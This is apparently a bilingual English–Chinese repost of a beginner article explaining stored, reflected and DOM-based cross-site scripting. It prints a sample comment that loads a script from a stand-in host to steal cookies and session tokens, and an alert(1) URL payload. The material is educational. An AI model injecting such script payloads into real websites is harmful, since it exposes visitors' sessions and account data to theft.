ddos攻击xss攻击
What the heck is Cross Site Scripting (XSS)?
跨站点脚本(XSS)到底是什么?
Well, OWASP, one of my go to sites for information, defines XSS as a
好吧,OWASP是我访问信息的站点之一,它将XSS定义为
“type of injection, in which malicious scripts are injected in otherwise benign and trusted websites.”
“注入类型,其中恶意脚本被注入到良性和可信的网站中。”
(https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))
( https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) )
SO, what does that mean? Basically it’s a sequence of instructions that sends malicious code to the user of the web application in a form of browser side script, in which the user’s web browser has NO idea that it’s bad code and it thinks it’s coming from a trusted website.
所以,那是什么意思? 基本上,这是一系列指令,以浏览器端脚本的形式将恶意代码发送给Web应用程序用户,其中用户的Web浏览器完全不知道它是错误的代码,并且认为它来自受信任的网站。
What can an attacker get from XSS? As an attacker, they are trying to get something to benefit them, so they can access session tokens, cookies, and much more information no one wants to have the whole universe to know about.
攻击者可以从XSS得到什么? 作为攻击者,他们试图获取使自己受益的东西,以便他们可以访问会话令牌,Cookie和更多信息,而这是没人想让整个宇宙都知道的。
There are two types of XSS:
XSS有两种类型:
Server XSS and Client XSS
服务器XSS和客户端XSS
(https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting)
( https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting )
Server XSS consists of Stored XSS and Client XSS consists of Reflected and DOM Based XSS.
服务器XSS由存储的XSS组成,而客户端XSS由反射的和基于DOM的XSS组成。
Stored XSS: What is it and why is it even important to know?
Stored XSS:这是什么,为什么知道它甚至很重要?
Let’s say you’re adding a comment on book club blog to someone who reviewed a book that you want to read, an attacker can load a comment that can say “Hey, I have a bundle deal for the four books in so-and-so website.. <script src=”*enter so-and-so.com/gethacked.js*” ></script> . Once you, as the interested user clicks that URL, a JavaScript file will activate gathering the users cookies and session tokens for the blog and accessing sensitive information stored in the users account, like address, credit card information if there’s a monthly subscription, and so much more. This affects everyone who visits the page because the link will always be there.
假设您是在读书俱乐部博客上添加评论的人,该评论评论了您要阅读的书,攻击者可以加载评论,说“嘿,我对这四本书有捆绑交易。这样的网站。<script src =” *输入so-and-so.com/gethacked.js * ” > </ script>。 一旦您作为感兴趣的用户单击该URL,JavaScript文件将激活收集博客的用户cookie和会话令牌,并访问存储在用户帐户中的敏感信息,例如地址,每月订阅的信用卡信息等。多得多。 这会影响访问该页面的每个人,因为该链接将始终存在。
Reflected XSS: What about this?
反映的XSS:那呢?
A perfect example of this attack is spam emails. So let’s say there’s a vulnerability where a script can be passed in a trusted websites URL. www.page.com/page1?home.html Would bring up the home page of whatever website, but let’s say www.page.com/page1?<script>alert(1)</script>. With this URL, once the user presses enter the Javascript will execute, causing a pop-up of an error message with 1 on it. Now as an attacker, with their out of the box thinking, they can make a script where they can get information from users once the user clicks onto the link.
垃圾邮件是这种攻击的一个很好的例子。 因此,假设存在一个漏洞,可以在受信任的网站URL中传递脚本。 www.page.com/page1? home.html会显示任何网站的主页,但假设是www.page.com/page1?<script>alert(1)</ script>。 使用此URL,一旦用户按下Enter键,JavaScript就会执行,并弹出带有1的错误消息。 现在,作为攻击者,他们可以开箱即用地制作脚本,一旦用户单击链接,便可以从用户那里获取信息。
The difference between Reflected XSS and Stored XSS is that Stored XSS is saved onto the server, going back to my example, because that there is a database of comments and reviews saved, the attackers comment is saved regardless if the user refreshes the page, where reflected XSS, a user has to go to the page in order for the attack to be executed.
Reflected XSS和Stored XSS之间的区别在于,将Stored XSS保存到服务器上,回到我的示例,因为存在一个保存评论和评论的数据库,所以无论用户刷新页面在哪里,攻击者的评论都会被保存。反映了XSS,用户必须转到该页面才能执行攻击。
Lastly, DOM Based XSS: What else could there be?
最后,基于DOM的XSS:还有什么呢?
Let’s say there’s a form that uses the users input to manipulate the DOM of the website. So the form is asking for a First Name and a Last Name, and once the user presses enter, the website brings up a “Hello *first name*!” So we know there’s Javascript in the source that shows the users First Name input, now as an attacker what they can do is enter a malicious script to gather any type of information like cookies and session tokens. With DOM based XSS, this isn’t shown on the source/html code of the website because it is being taken from the input the user is inputting.
假设有一种使用用户输入来操纵网站DOM的表单。 因此,该表单要求输入名字和姓氏,一旦用户按下Enter键,网站就会显示“你好*名字*!”。 因此,我们知道在源代码中有Javascript可以显示用户的“名字”输入,现在作为攻击者,他们可以做的就是输入恶意脚本来收集任何类型的信息,例如cookie和会话令牌。 使用基于DOM的XSS,该代码不会显示在网站的源代码/ html代码中,因为它是从用户输入的输入中获取的。
Please keep in mind that my examples aren’t the only way these XSS attacks can be performed, there are many more ways to attack users using these methods. One just has to be very creative and think outside the box.
请记住,我的示例并不是执行这些XSS攻击的唯一方法,还有更多使用这些方法攻击用户的方法。 一个人必须非常有创造力,并在框外思考。
翻译自: https://medium.com/@vanessamorales.1023/xss-for-dummies-injection-attack-series-fc4bcdd557d7
ddos攻击xss攻击
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
